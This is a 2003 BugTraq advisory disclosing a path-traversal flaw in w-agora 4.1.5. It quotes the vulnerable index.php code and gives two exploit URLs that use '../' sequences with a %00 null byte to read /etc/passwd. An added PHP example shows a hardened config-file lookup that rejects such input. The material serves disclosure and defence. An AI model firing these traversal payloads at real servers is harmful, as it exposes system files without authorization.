BugTraq
Bug in w-agora Jan 12 2003 03:03PM
sonyy 2vias com ar (1 replies)
=======================
==Shell Security Team==
=======================

==============================
====Advisory For W-agora======
==============================

- Product : w-agora
- Tested version : version 4.1.5
- Website : http://www.w-agora.net
- Discovery By Sonyy
- Vendor Status: informed
- Problem : A security vulnerability in W-agora

The bug :
==========

index.php

if (empty($bn)) {
    # No forum selected -> default to 'site' configuration
    $site = empty($site) ? "agora" : $site;

    $cfg_file = "${cfg_dir}/site_${site}.${ext}";
    $expnd = "all";
} else {
    $cfg_file = "${cfg_dir}/${bn}.${ext}";
}

Exploit :
=========

index.php

http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00

And modules.php

http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1

Any Question :
==============

Sonyy --> Sonico60 (at) hotmail (dot) com

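A hardened form of the configuration-file lookup quoted from index.php in the advisory above, as an added example that is not part of the original post and not w-agora's own code. The function name resolve_cfg_file(), the allowed-name pattern and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example (not w-agora code): resolve a config file name without
// letting request parameters escape the configuration directory.
// resolve_cfg_file() and the name pattern are hypothetical.

function resolve_cfg_file(string $cfg_dir, string $ext, ?string $bn, ?string $site): ?string
{
    // Same selection logic as the quoted index.php: no forum -> site config.
    if ($bn === null || $bn === '') {
        $name = 'site_' . (($site === null || $site === '') ? 'agora' : $site);
    } else {
        $name = $bn;
    }

    // Allow-list: letters, digits, underscore, hyphen only. This rejects
    // "/", "..", and NUL bytes (the %00 truncation trick) in one check.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    // Defence in depth: the canonical path must still sit inside $cfg_dir.
    $base = realpath($cfg_dir);
    $path = realpath($cfg_dir . '/' . $name . '.' . $ext);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary config directory with one forum config.
$dir = sys_get_temp_dir() . '/cfg_demo_' . getmypid();
@mkdir($dir);
file_put_contents("$dir/fm_d1.php", "<?php // constructed sample config\n");

$inputs = [
    ['fm_d1', null],                       // legitimate forum name
    ["../../../../etc/passwd\0", 'demos'], // decoded form of the advisory's bn value
    [null, '../x'],                        // traversal through site instead
];
foreach ($inputs as [$bn, $site]) {
    $r = resolve_cfg_file($dir, 'php', $bn, $site);
    echo json_encode($bn), ' / ', json_encode($site), ' => ',
         $r === null ? 'rejected' : 'accepted', "\n";
}
unlink("$dir/fm_d1.php");
rmdir($dir);
```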
Re: Bug in w-agora Jan 15 2003 11:07PM
Nicob (nicob nicob net) (1 replies)
Re: Bug in w-agora Jan 18 2003 01:07AM
Ian Clelland (ian veryfresh com)


 
